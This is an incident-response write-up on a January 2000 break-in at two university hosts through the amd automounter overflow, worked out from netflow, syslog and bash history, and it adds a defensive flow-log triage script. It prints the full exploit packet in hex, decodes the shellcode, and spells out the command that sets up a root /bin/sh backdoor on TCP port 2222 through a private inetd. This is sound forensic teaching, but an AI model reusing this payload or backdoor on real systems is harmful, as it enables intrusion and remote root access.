After the break-in, they defaced the victim1 home page and used victim2 to scan other networks.
See
http://www.cert.org/incident_notes/IN-99-05.html
http://www.cert.org/advisories/CA-99-12-amd.html
Jan 12 and 14
Jan 15
Jan 16
Jan 17
Jan 18
Jan 19
Jan 20
Jan 21
Jan 12 and 14
Our router netflow log had already picked up some sunrpc traffic to victim1 before the break-in. It is a sunrpc sweep: one small packet to port 111 on host after host within the same second, which is the equivalent of an "rpcinfo -p" query against each of them. The longer flows (several packets, a few hundred octets) are hosts whose portmapper answered; the two flows to victim1 at 07:56:20 are the portmapper dump of victim1 itself.
Start time          End time            Source           Destination       Src port  Dst port      Pkts  Oct
====================================================================================================================
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.211    1054      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.209    1052      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.210    1053      111 (sunrpc)   1     60
0112.07:55:53.266   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.224    1067      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.208    1051      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.207    1050      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.205    1048      111 (sunrpc)   1     60
0112.07:55:53.266   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.233    1076      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.203    1046      111 (sunrpc)   1     60
0112.07:55:50.266   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.201    1044      111 (sunrpc)   2    120
0112.07:55:53.266   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.234    1077      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.202    1045      111 (sunrpc)   1     60
0112.07:55:53.262   0112.07:55:53.262   xxx.yyy.33.139   137.189.94.204    1047      111 (sunrpc)   1     60
0112.07:55:53.266   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.213    1056      111 (sunrpc)   1     60
0112.07:55:50.270   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.215    1058      111 (sunrpc)   2    120
0112.07:55:53.266   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.214    1057      111 (sunrpc)   1     60
0112.07:55:53.266   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.219    1062      111 (sunrpc)   1     60
0112.07:55:53.266   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.218    1061      111 (sunrpc)   1     60
0112.07:55:50.270   0112.07:55:53.266   xxx.yyy.33.139   137.189.94.220    1063      111 (sunrpc)   2    120
0112.07:55:49.466   0112.07:55:53.594   xxx.yyy.33.139   137.189.94.135    4947      111 (sunrpc)   3    156
0112.07:55:49.470   0112.07:55:53.594   xxx.yyy.33.139   137.189.94.138    4950      111 (sunrpc)   3    120
0112.07:55:49.502   0112.07:55:53.590   xxx.yyy.33.139   137.189.94.154    4989      111 (sunrpc)   6    364
0112.07:55:49.274   0112.07:55:53.590   xxx.yyy.33.139   137.189.94.155    4967      111 (sunrpc)   4    216
0112.07:55:49.274   0112.07:55:53.590   xxx.yyy.33.139   137.189.94.153    4965      111 (sunrpc)   4    216
0112.07:55:49.266   0112.07:55:53.590   xxx.yyy.33.139   137.189.94.154    4966      111 (sunrpc)   4    216
0112.07:55:47.694   0112.07:55:53.590   xxx.yyy.33.139   137.189.94.87     4899      111 (sunrpc)   5    240
0112.07:55:47.694   0112.07:55:53.590   xxx.yyy.33.139   137.189.94.86     4898      111 (sunrpc)   5    276
0112.07:56:20.262   0112.07:56:28.834   xxx.yyy.33.139   137.189.victim1   2369      111 (sunrpc)   5    268
0112.07:56:20.678   0112.07:56:26.462   xxx.yyy.33.139   137.189.victim1   2699      111 (sunrpc)   6    364
0114.21:51:58.779   0114.21:51:59.79    aa.bb.6.29       137.189.victim1   1976      111 (sunrpc)   3    156

In fact at least three attackers (ccc.dd.101.162, aa.bb.6.29 and xxx.yyy.33.139) port-scanned the 137.189 network between 12 and 17 January.
Jan 15
On the morning of 15 January ccc.dd.101.162 queried the portmapper on both victim1 and victim2:

Start time          End time            Source           Destination       Src port       Dst port      Pkts  Oct
====================================================================================================================
0115.08:39:15.319   0115.08:39:17.431   ccc.dd.101.162   137.189.victim1     758 (nlogin) 111 (sunrpc)   6    288
0115.08:39:15.31    0115.08:39:17.419   ccc.dd.101.162   137.189.victim1   13665          111 (sunrpc)   3    120
0115.08:39:02.231   0115.08:39:06.351   ccc.dd.101.162   137.189.victim2    6206          111 (sunrpc)   5    204
0115.08:39:03.511   0115.08:39:06.367   ccc.dd.101.162   137.189.victim2     690          111 (sunrpc)   6    288

Bingo! The amd port is open. This is what such a query returns:
# rpcinfo -p victim1.ie.cuhk.edu.hk
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp   1017  status
    100024    1   tcp   1019  status
    100011    1   udp    604  rquotad
    100011    2   udp    604  rquotad
    100005    1   udp    614  mountd
    100005    1   tcp    616  mountd
    100005    2   udp    619  mountd
    100005    2   tcp    621  mountd
    100005    3   udp    624  mountd
    100005    3   tcp    626  mountd
    100003    2   udp   2049  nfs
    100021    1   udp   1026  nlockmgr
    100021    3   udp   1026  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    656  amd
    300019    1   udp    657  amd

# /usr/sbin/rpcinfo -p victim2.ie.cuhk.edu.hk
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp   1000  status
    100024    1   tcp   1002  status
    100011    1   udp   1011  rquotad
    100011    2   udp   1011  rquotad
    100005    1   udp   1021  mountd
    100005    1   tcp   1023  mountd
    100005    2   udp    602  mountd
    100005    2   tcp    604  mountd
    100005    3   udp    607  mountd
    100005    3   tcp    609  mountd
    100003    2   udp   2049  nfs
    100021    1   udp   1024  nlockmgr
    100021    3   udp   1024  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    637  amd
    300019    1   udp    638  amd

The portmapper hands out the port of every registered RPC service, so the attacker did not need to scan for amd (program 300019, the automounter covered by CA-99-12 above): the dump tells him it listens on UDP 657 on victim1 and UDP 638 on victim2.

At 18:42 the attacker came back, this time going for amd. The flow shows about 5.4 KB (5 packets, 5480 octets) pushed to victim1's amd UDP port, 657, followed six seconds later by a connection from the same source to TCP port 2222, a port that appears nowhere in the rpcinfo output above. Three minutes later the same sequence was run against victim2 (its amd port 638, then 2222):
Start time          End time            Source           Destination       Src port  Dst port      Pkts   Oct
====================================================================================================================
0115.18:42:26.179   0115.18:42:46.223   ccc.dd.101.162   137.189.victim1     653     657 (amd)      5   5480
0115.18:42:32.659   0115.18:43:15.67    ccc.dd.101.162   137.189.victim1   31321     2222           7    299
0115.18:45:51.282   0115.18:45:56.302   ccc.dd.101.162   137.189.victim2     692     638            2   2192
0115.18:45:50.766   0115.18:45:50.766   ccc.dd.101.162   137.189.victim2     691     111 (sunrpc)   1     84
0115.18:45:52.718   0115.18:45:59.958   ccc.dd.101.162   137.189.victim2   31369     2222           7    299

From the system log of victim1, we pick up this:
Jan 15 18:50:08 victim1 <27>Jan 15 18:50:08 amd[479]: amq requested mount of ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P [~P (0x90, a NOP) repeated for several hundred more bytes] ~P~P~P~P~P~Pë(^~M^^P~I^^~CÃ^H~I^^D~CÃ^C~I^^H~Cë^K~M^N~IÊ3À~IF^L~HF^W~HF^Z°^KÍ~@èÓÿÿÿ18 Jan 1998--str/bin/sh(-c)/bin/echo '2222 stream tcp nowait root /bin/sh s
Jan 15 18:50:08 victim1 p/h;/usr/sbin/inetd /tmp/h ~PÒòÿ¿Òòÿ¿^C
Jan 15 19:05:22 victim1 rz[25410]: [root] amdex/ZMODEM: 12716 Bytes, 3999 BPS
Jan 15 19:05:24 victim1 rz[25410]: [root] pscan.c/ZMODEM: 4805 Bytes, 3759 BPS
Jan 15 19:09:46 victim1 rz[25467]: [root] ben.c/ZMODEM: 1536 Bytes, 1972 BPS

amd logged the oversized mount request it was handed: the NOP sled, the shellcode (rendered by syslog as control characters), the strings the shellcode uses and, at the end, the repeated return address (Òòÿ¿ is d2 f2 ff bf). syslog split the long message into two records and the piece between "/bin/sh s" and "p/h" was lost; the complete payload is in the tcpdump below. Fifteen minutes later the attacker, already root, uploaded three files over the shell with rz (ZMODEM): amdex, pscan.c and ben.c.

When you look at the tcpdump, it shows:
14:09:19.621925 eth0 < ntec84.1027 > victim.711: udp 1068
 .....
 .....
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 9090  ................
 9090 9090 9090 9090 9090 9090 9090 eb28  ...............(
 5e8d 5e10 891e 83c3 0889 5e04 83c3 0389  ^.^.......^.....
 5e08 83eb 0b8d 0e89 ca33 c089 460c 8846  ^........3..F..F
 1788 461a b00b cd80 e8d3 ffff ff31 3820  ..F..........18
 4a61 6e20 3139 3938 2d2d 7374 722f 6269  Jan 1998--str/bi
 6e2f 7368 282d 6329 2f62 696e 2f65 6368  n/sh(-c)/bin/ech
 6f20 2732 3232 3220 2020 2020 2020 2073  o '2222        s
 7472 6561 6d20 2074 6370 2020 2020 206e  tream  tcp     n
 6f77 6169 7420 2072 6f6f 7420 2020 202f  owait  root    /
 6269 6e2f 7368 2073 6820 2d69 273e 3e20  bin/sh sh -i'>>
 2f74 6d70 2f68 3b2f 7573 722f 7362 696e  /tmp/h;/usr/sbin
 2f69 6e65 7464 202f 746d 702f 6820 2623  /inetd /tmp/h &#
 90d2 f2ff bfd2 f2ff bfd2 f2ff bfd2 f2ff  ................
 bfd2 f2ff bf00 0000                      ........
14:09:21.611670 eth0 < ntec84.1098 > victim.2222: S 2946836865:2946836865(0) win 32120 (DF)
 4500 003c 1342 4000 4006 a5a2 c0a8 8054  E..<.B@.@......T
 c0a8 8032 044a 08ae afa5 2981 0000 0000  ...2.J....).....
 a002 7d78 d5b3 0000 0204 05b4 0402 080a  ..}x............
 0b5e 8186 0000 0000 0103 0300            .^..........

(This capture shows the same payload delivered to an amd instance on port 711 of a host called victim, from ntec84, with the connection to port 2222 two seconds later; it is not the 18:42 flow to victim1's port 657 and its timestamps are its own.) Note also that victim1's clock is about 8 minutes ahead of the router's: the amd log entry stamped 18:50:08 is the flow that started at 18:42:26.

Reading the payload: about a kilobyte of 0x90 (NOP) bytes, then a 47-byte stub (eb 28 ... cd 80 e8 d3 ff ff ff). The short jmp lands on the call, the call returns into pop esi, so esi points at the data right after the call; the stub writes NULs over the "(" and ")" to terminate "/bin/sh" and "-c" in place, stores the three argv pointers, and issues the execve system call (mov al,0x0b; int 0x80). The command it executes is

/bin/echo '2222 stream tcp nowait root /bin/sh sh -i' >> /tmp/h; /usr/sbin/inetd /tmp/h &

The five copies of d2 f2 ff bf at the tail are 0xbffff2d2, the stack address the attacker guessed for the sled, written over amd's saved return address; the "#" after the "&" turns that junk into a shell comment. The single-quoted string is an inetd.conf entry: service port 2222, stream socket, TCP, nowait, run as root, program /bin/sh with argument vector "sh -i". A second inetd is started on the private configuration file /tmp/h, so /etc/inetd.conf is left untouched and anyone who connects to TCP port 2222 gets an interactive root shell with the socket as its terminal. On a suspect host the things to look for are a second inetd process whose argument is a file under /tmp, and a listener on a port no configured service accounts for.
Between 18:57:00 and 18:58:52 another attacker (possibly the same person from a different address), 63.14.53.109, got a root shell on victim1 through port 2222 and then used victim1 to scan the 207.246 network.
Start time          End time            Source           Destination       Src port      Dst port   Pkts    Oct
====================================================================================================================
0115.18:57:00.569   0115.18:58:52.533   63.14.53.109     137.189.victim1   1083          2222         97  22708
0115.19:00:49.724   0115.19:00:49.724   207.246.1.80     137.189.victim1    111 (sunrpc) 1594          1     40
0115.19:00:49.612   0115.19:00:49.612   207.246.1.75     137.189.victim1    111 (sunrpc) 1589          1     40
... ...
Between 19:00:49 and 19:16:46 the attacker made 6578 sunrpc probes!
... ...
0115.19:16:46.965   0115.19:16:47.513   207.246.159.34   137.189.victim1    111 (sunrpc)  790          4    496
0115.19:16:46.797   0115.19:16:47.333   207.246.159.32   137.189.victim1    111 (sunrpc)  786          4    496

Note the direction of these records: they are the answers coming back from port 111 on the 207.246 hosts to victim1; the probes victim1 sent are the other half of each exchange. In a flow log like this one, an outbound scan from one of your own hosts shows up as thousands of short flows from the same service port on many different sources, all converging on that host.

From the .bash_history we have some idea of what the attacker was doing at that time:
ls -l /pwd
pwd
ls -l
pwd
uname -a; pwd; ls
cd home
ls
cd httpd
ls
cd html
ls
./amdex 207.246.0.2
./amdex
chmod +x amdex
ls
./amdex
./amdex 207.246.0.2
./amdex 207.246.0.51
./amdex 207.246.1.3
./amdex 207.246.2.213
./amdex 207.246.2.253
./amdex 207.246.3.251
./amdex 207.246.3.254
./amdex 207.246.52.250
ls
ps ux
who
kill -9 26859
killall *
ps ux
kill -9 25479
ps ux
kill -9 25867
ps ux
ls
cd home
ls
cd httpd
ls
cd html
rz
ls
make pscan.c
ls
make pscan
ls
rm *.c
ls
./pscan
./pscan 207.246 111 &
ls
rz
make ben
ls
cat wuftp.log
./pscan 207.246 111 &
ps ux
ls
cat wuftp.log
cat wuftp.log
ps ux
sssls
ps ux
kill -9 25867
ps ux
kill -9 25866
ps ux
killall ./*
ls
ps ux
ls
rm ben*
ls
rm pscan
rm *.log
amdex is presumably the amd exploit (the binary uploaded with rz at 19:05:22, the same attack that had just been used against victim1) and pscan a port scanner: "./pscan 207.246 111 &" is what produced the 6578 sunrpc probes of the 207.246 network seen in the netflow log. ben was compiled from ben.c but never run in this history, so we do not know what it was.
First the attacker tried amdex against a handful of 207.246 hosts. It does not seem to have worked, so he killed the amdex processes and ran pscan instead. Before leaving he removed the sources, pscan, ben and the log files (rm *.c; rm ben*; rm pscan; rm *.log), so we cannot say exactly what they did on victim1.
Once the port 2222 backdoor was open, at least 9 different attackers visited victim1 over the following days, coming and going as they pleased.
At least 14 attackers visited victim2 between 15 and 20 January.
Wow...... What a party!
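The flow-log checks used throughout this write-up (the sunrpc sweep of 12 January, the amd hit followed by the port 2222 connection, the 207.246 scan seen from its reply side, and the head-count of distinct sources using the backdoor behind the "at least 9 / at least 14" figures) as one added worked example. This is not code from the original report; it runs on a constructed subset of the records quoted above, in the router's own export format, and assumes the year 2000, which the export does not carry:

```python
"""Flow-log triage for the netflow records quoted in this write-up (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Set, Tuple


class Flow(NamedTuple):
    start: datetime
    end: datetime
    src: str
    dst: str
    sport: int
    dport: int
    pkts: int
    octets: int


class Scan(NamedTuple):
    src: str
    dport: int
    targets: int
    span_s: float


# Constructed sample: a subset of the records shown above, verbatim apart
# from whitespace.
SAMPLE = """\
0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.211 1054 ( ) 111 ( sunrpc ) 1 60
0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.209 1052 ( ) 111 ( sunrpc ) 1 60
0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.224 1067 ( ) 111 ( sunrpc ) 1 60
0112.07:55:50.266 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.201 1044 ( ) 111 ( sunrpc ) 2 120
0112.07:56:20.262 0112.07:56:28.834 xxx.yyy.33.139 137.189.victim1 2369 ( ) 111 ( sunrpc ) 5 268
0114.21:51:58.779 0114.21:51:59.79 aa.bb.6.29 137.189.victim1 1976 ( ) 111 ( sunrpc ) 3 156
0115.18:42:26.179 0115.18:42:46.223 ccc.dd.101.162 137.189.victim1 653 ( ) 657 ( amd ) 5 5480
0115.18:42:32.659 0115.18:43:15.67 ccc.dd.101.162 137.189.victim1 31321 ( ) 2222 ( ) 7 299
0115.18:57:00.569 0115.18:58:52.533 63.14.53.109 137.189.victim1 1083 ( ) 2222 ( ) 97 22708
0115.19:00:49.724 0115.19:00:49.724 207.246.1.80 137.189.victim1 111 ( sunrpc ) 1594 ( ) 1 40
0115.19:00:49.612 0115.19:00:49.612 207.246.1.75 137.189.victim1 111 ( sunrpc ) 1589 ( ) 1 40
0115.19:16:46.965 0115.19:16:47.513 207.246.159.34 137.189.victim1 111 ( sunrpc ) 790 ( ) 4 496
0116.15:31:52.826 0116.15:32:18.770 xx.14.43.220 137.189.victim1 1107 ( ) 2222 ( ) 7 306
0116.16:40:35.191 0116.16:40:49.19 yyy.253.90.46 137.189.victim1 1146 ( ) 2222 ( ) 6 254
"""

FLOW_RE = re.compile(
    r"^(?P<start>\d{4}\.\d\d:\d\d:\d\d\.\d+)\s+(?P<end>\d{4}\.\d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<src>\S+)\s+(?P<dst>\S+)\s+"
    r"(?P<sport>\d+)\s*\([^)]*\)\s+(?P<dport>\d+)\s*\([^)]*\)\s+"
    r"(?P<pkts>\d+)\s+(?P<octets>\d+)\s*$"
)

ASSUMED_YEAR = "2000"  # the export only carries MMDD; assumption, see lead-in


def parse_time(stamp: str) -> datetime:
    """'0115.18:42:26.179' -> datetime (1 to 6 fractional digits accepted)."""
    mmdd, hms = stamp.split(".", 1)
    return datetime.strptime(f"{ASSUMED_YEAR}{mmdd} {hms}", "%Y%m%d %H:%M:%S.%f")


def parse_flows(text: str) -> List[Flow]:
    """Keep the lines that are records; skip headers, rules and interleaved prose."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line.strip())
        if not m:
            continue
        flows.append(Flow(parse_time(m["start"]), parse_time(m["end"]),
                          m["src"], m["dst"], int(m["sport"]), int(m["dport"]),
                          int(m["pkts"]), int(m["octets"])))
    return flows


def horizontal_scans(flows, min_targets=3, window=timedelta(minutes=5)) -> List[Scan]:
    """One source hitting the same port on many hosts inside `window`."""
    by_key: Dict[Tuple[str, int], List[Flow]] = defaultdict(list)
    for f in flows:
        by_key[(f.src, f.dport)].append(f)
    found = []
    for (src, dport), fl in by_key.items():
        targets = {f.dst for f in fl}
        starts = sorted(f.start for f in fl)
        span = starts[-1] - starts[0]
        if len(targets) >= min_targets and span <= window:
            found.append(Scan(src, dport, len(targets), span.total_seconds()))
    return sorted(found)


def reply_fanin(flows, service_port=111, min_sources=3) -> List[Tuple[str, int]]:
    """Many hosts answering from `service_port` to one destination: that
    destination is scanning them (its own probes went the other way)."""
    srcs: Dict[str, Set[str]] = defaultdict(set)
    for f in flows:
        if f.sport == service_port:
            srcs[f.dst].add(f.src)
    return sorted((dst, len(s)) for dst, s in srcs.items() if len(s) >= min_sources)


def exploit_then_backdoor(flows, host, exploit_port=657, backdoor_port=2222,
                          within=timedelta(minutes=5)) -> List[Tuple[str, float]]:
    """Sources that hit the amd port on `host` and then connected to the
    backdoor port within `within`: (src, seconds between the two)."""
    hits = set()
    for a in flows:
        if a.dst == host and a.dport == exploit_port:
            for b in flows:
                if (b.src == a.src and b.dst == host and b.dport == backdoor_port
                        and timedelta(0) <= b.start - a.start <= within):
                    hits.add((a.src, round((b.start - a.start).total_seconds(), 3)))
    return sorted(hits)


def backdoor_visitors(flows, host, backdoor_port=2222) -> List[str]:
    """Distinct sources that connected to the backdoor port on `host`."""
    return sorted({f.src for f in flows if f.dst == host and f.dport == backdoor_port})


if __name__ == "__main__":
    fl = parse_flows(SAMPLE)
    print("sweeps:", horizontal_scans(fl))
    print("scanners seen from the reply side:", reply_fanin(fl))
    print("exploit -> backdoor:", exploit_then_backdoor(fl, "137.189.victim1"))
    print("backdoor visitors:", backdoor_visitors(fl, "137.189.victim1"))
```

On the sample the sweep detector reports only xxx.yyy.33.139 against port 111 (five targets in thirty seconds), the reply-side check names victim1 as the host scanning port 111, the exploit-to-backdoor check pairs ccc.dd.101.162's amd hit with its 2222 connection 6.48 seconds later, and the visitor list has four entries because the sample is a subset of the log; on the full log it is what the "at least 9" figure above counts.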
Jan 16
This is the day the victim1 web pages were changed.
Many attackers were still coming into victim1 through port 2222 that day:
Start time          End time            Source           Destination       Src port          Dst port   Pkts    Oct
====================================================================================================================
0116.15:31:52.826   0116.15:32:18.770   xx.14.43.220     137.189.victim1   1107              2222         7    306
0116.15:40:20.265   0116.15:40:34.1     yyy.197.58.25    137.189.victim1   1959              2222         5    208
0116.15:41:24.957   0116.15:41:26.829   yyy.197.58.25    137.189.victim1   1959              2222         5    213
0116.15:46:37.649   0116.15:46:37.917   yyy.197.58.25    137.189.victim1   1959              2222         2     80
0116.16:34:26.144   0116.16:34:27.180   yyy.253.90.32    137.189.victim1   1138              2222         3    128
0116.16:33:58.680   0116.16:34:24.560   xx.14.43.220     137.189.victim1   1351 (equationb)  2222         8    328
0116.16:36:32.280   0116.16:37:51.344   xx.14.43.220     137.189.victim1   1353              2222        21    874
0116.16:36:47.399   0116.16:38:21.583   yyy.253.90.32    137.189.victim1   1138              2222         9    458
0116.16:39:07.903   0116.16:39:07.903   yyy.253.42.1     137.189.victim1      0              2816         1     56
0116.16:39:42.567   0116.16:39:45.639   xx.14.43.220     137.189.victim1   1353              2222         3    120
0116.16:40:35.191   0116.16:40:49.19    yyy.253.90.46    137.189.victim1   1146              2222         6    254
0116.16:40:57.975   0116.16:40:57.975   yyy.253.42.1     137.189.victim1      0              2816         1     56
0116.16:46:09.702   0116.16:46:10.842   yyy.253.90.46    137.189.victim1   1146              2222         3    140
0116.16:47:13.546   0116.16:47:18.918   yyy.253.90.46    137.189.victim1   1146              2222         6    248
0116.16:48:10.818   0116.16:48:52.886   yyy.253.90.46    137.189.victim1   1146              2222         6    271
0116.17:23:11.712   0116.17:24:00.240   yyy.253.90.46    137.189.victim1   1146              2222        75  33065
0116.17:25:16.336   0116.17:25:41.368   yyy.253.90.46    137.189.victim1   1155              80 (www)    10   1217
0116.17:25:13.60    0116.17:25:35.824   yyy.253.90.46    137.189.victim1   1154              80 (www)    12   1559
0116.17:25:57.40    0116.17:26:22.940   yyy.253.90.46    137.189.victim1   1161              80 (www)    34   2229
0116.17:26:05.164   0116.17:26:28.692   xx.14.43.220     137.189.victim1   1374              80 (www)    12   1661
0116.17:26:09.288   0116.17:26:34.196   xx.14.43.220     137.189.victim1   1375              80 (www)    10   1268
0116.17:27:13.256   0116.17:27:33.416   xx.14.43.220     137.189.victim1   1376              80 (www)    11   1791
0116.17:27:14.904   0116.17:27:38.916   xx.14.43.220     137.189.victim1   1377              80 (www)     8   1448

(The two records from yyy.253.42.1 with source port 0 and "destination port" 2816 are ICMP, which this NetFlow export encodes as type*256+code in the port field: 2816 is type 11, time exceeded, i.e. a router on the attackers' network answering a traceroute run from victim1.)

By comparing the timestamp of the changed web page with the message log, we believe that 209.253.90.46 made the change: the 75-packet, 33 KB flow to port 2222 from that address at 17:23:11 to 17:24:00 matches the two rz transfers logged at 17:31:31 and 17:31:45 once the 8-minute clock offset is taken into account, and both that address and xx.14.43.220 fetched the page over port 80 immediately afterwards to admire the result.
Jan 16 17:31:31 victim1 rz[29281]: [root] index.htm/ZMODEM: 423 Bytes, 402 BPS
Jan 16 17:31:45 victim1 rz[29281]: [root] root.JPG/ZMODEM: 16476 Bytes, 1279 BPS

From the .bash_history we can see:

who
woot
cd home/httpd/html
Is
ls
mv index.html index2.html
ls
rz
mv index.htm index.html
w00t
heat#

So victim1 was put on the hacked-site list at www.attrition.org/mirror/attrition/2000-01.html. Once the page had been changed there was a lot of port 80 traffic to victim1 as the heat group showed off their work. :(
Note that victim1 and victim2 did not provide any service to any user and had never been announced to anyone. The attackers must have found them with their network scanning tools; attackers are always scanning for holes to exploit.
Here are some references. You may take a look at them if you are interested and have time. :)